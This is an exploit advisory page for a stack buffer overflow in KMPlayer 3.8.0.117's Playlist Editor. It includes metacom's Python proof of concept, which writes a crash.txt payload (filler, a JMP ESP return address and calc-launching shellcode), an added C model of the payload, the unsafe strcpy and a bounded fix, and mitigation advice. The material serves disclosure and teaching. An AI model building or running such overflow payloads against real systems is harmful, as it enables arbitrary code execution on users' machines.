Vendor: KMPlayer
By: metacom
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: KMPlayer
Affected Version From: 3.8.0.117
Affected Version To: 3.8.0.117
Patch Exists: YES
Related CWE: N/A
CPE: KMPlayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2020

KMPlayer 3.8.0.117 Buffer Overflow

KMPlayer 3.8.0.117 (KMP Plus) contains a stack-based buffer overflow in its Playlist Editor. When an overlong string is pasted into the New Album field, or a crafted playlist carrying such a string is opened, the copy into a fixed-size stack buffer runs past the end of the buffer and overwrites the saved return address, so an attacker who can get a user to paste or open the crafted data executes arbitrary code with that user's privileges. The exploit below uses 250 bytes of filler ("A") to reach the saved return address, overwrites it with the address of a JMP ESP instruction in kernel32.dll (0x7C86467B on the tested Windows XP SP3 English system), and follows it with 16 bytes of shellcode that builds the NUL-terminated string "calc" on the stack and calls a hard-coded library address to launch calc.exe. Both addresses are valid only for that exact OS, service pack and language build; with ASLR, or any other DLL build, the return address and the call target must be found again, otherwise the process simply crashes.
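The following added example is not part of the original advisory or metacom's exploit. It models the vulnerable copy the advisory describes, builds the payload in the exact layout crash.txt uses (250 filler bytes, the little-endian address of JMP ESP, the 16-byte shellcode), and shows the bounded copy that stops the overflow. The function names and the 64-byte ALBUM_NAME_MAX are assumptions for illustration; the real KMPlayer buffer and its size are not given on the page.

```c
/* Added example, not the original advisory's or metacom's code.
 * Assumed: set_album_name*() and ALBUM_NAME_MAX stand in for the real
 * KMPlayer code, which the page does not show. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define JUNK_LEN       250           /* filler count from the script */
#define RET_ADDR       0x7C86467BUL  /* JMP ESP in kernel32.dll, XP SP3 EN */
#define ALBUM_NAME_MAX 64            /* assumed size of the stack buffer */

/* The script's 16-byte shellcode: push NUL, push "calc", push a pointer to
 * the string, then call a hard-coded XP SP3 library address (not named on
 * the page) that launches calc.exe. */
static const uint8_t shellcode[] = {
    0x31, 0xC9,                    /* xor ecx,ecx                 */
    0x51,                          /* push ecx       (NUL)        */
    0x68, 0x63, 0x61, 0x6C, 0x63,  /* push "calc"                 */
    0x54,                          /* push esp       (ptr to str) */
    0xB8, 0xC7, 0x93, 0xC2, 0x77,  /* mov eax,0x77c293c7          */
    0xFF, 0xD0                     /* call eax                    */
};

/* Lay out the payload as crash.txt does: junk | ret addr (LE) | shellcode.
 * Returns the number of bytes written, or 0 if the buffer is too small. */
size_t build_payload(uint8_t *out, size_t cap)
{
    size_t need = JUNK_LEN + 4 + sizeof shellcode;
    if (cap < need)
        return 0;
    memset(out, 'A', JUNK_LEN);
    /* x86 is little-endian: the low byte of the address goes first, which
     * is what struct.pack("<L", ...) produces in the script. */
    out[JUNK_LEN + 0] = (uint8_t)(RET_ADDR & 0xFF);
    out[JUNK_LEN + 1] = (uint8_t)((RET_ADDR >> 8) & 0xFF);
    out[JUNK_LEN + 2] = (uint8_t)((RET_ADDR >> 16) & 0xFF);
    out[JUNK_LEN + 3] = (uint8_t)((RET_ADDR >> 24) & 0xFF);
    memcpy(out + JUNK_LEN + 4, shellcode, sizeof shellcode);
    return need;
}

/* Vulnerable pattern: unbounded strcpy into a fixed stack buffer. Input
 * longer than the buffer overwrites the saved return address, so when the
 * function returns, EIP is the attacker's 4 bytes (JMP ESP) and ESP points
 * at the shellcode that follows them in the payload. Never call it with
 * the payload above; it is here only to show the defect. */
int set_album_name_unsafe(const char *name)
{
    char buf[ALBUM_NAME_MAX];
    strcpy(buf, name);             /* no length check */
    return (int)strlen(buf);
}

/* Hardened form: refuse anything that does not fit together with its
 * terminator, then copy exactly that many bytes. Returns the stored length
 * or -1 on rejection. */
int set_album_name(const char *name)
{
    char buf[ALBUM_NAME_MAX];
    const char *end = memchr(name, '\0', ALBUM_NAME_MAX);  /* bounded scan */
    if (end == NULL)               /* no NUL within the buffer size: reject */
        return -1;
    size_t n = (size_t)(end - name);
    memcpy(buf, name, n + 1);      /* includes the terminator */
    return (int)strlen(buf);
}
```

In the model the buffer is 64 bytes, yet the script's filler is 250 bytes: the distance from the start of the buffer to the saved return address depends on the real frame layout (locals, padding, saved registers), and metacom found it for KMPlayer by crashing the editor and watching where the pattern landed in EIP. The hardened setter rejects the whole payload before any copy happens, which is the check the vulnerable code lacks.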

Mitigation:

Update to a KMPlayer release later than 3.8.0.117 (the page records that a patch exists). Until the update is applied, do not paste or open untrusted playlist data in the Playlist Editor, since the overflow needs nothing more than that user action.

Exploit-DB raw data:

#!/usr/bin/python3
# KMPlayer 3.8.0.117 Buffer Overflow
# Author: metacom
# Tested on: Windows XP Pro SP3 EN
# Download link: http://www.chip.de/downloads/KMPlayer_33859258.html
# Version: 3.8.0.117 KMP Plus
# Howto / Notes:
# Run KMPlayer Playlist Editor > New Album and paste the contents of crash.txt
import struct

def little_endian(address):
    # Pack a 32-bit address as 4 little-endian bytes (x86 stack order)
    return struct.pack("<L", address)

junk = b"\x41" * 250                 # filler up to the saved return address
eip = little_endian(0x7C86467B)      # 7C86467B  FFE4  JMP ESP  kernel32.dll (XP SP3 EN)

# 16 bytes: build NUL-terminated "calc" on the stack, push its address and
# call the hard-coded XP SP3 library function at 0x77c293c7 to launch calc.exe
shellcode = (
    b"\x31\xC9"                # xor ecx,ecx
    b"\x51"                    # push ecx            (NUL terminator)
    b"\x68\x63\x61\x6C\x63"    # push 0x636c6163     ("calc")
    b"\x54"                    # push esp            (pointer to "calc\0")
    b"\xB8\xC7\x93\xC2\x77"    # mov eax,0x77c293c7
    b"\xFF\xD0"                # call eax
)

exploit = junk + eip + shellcode     # 250 + 4 + 16 = 270 bytes

try:
    with open("crash.txt", "wb") as rst:   # binary mode: no newline translation
        rst.write(exploit)
except OSError as e:
    print("Error:", e)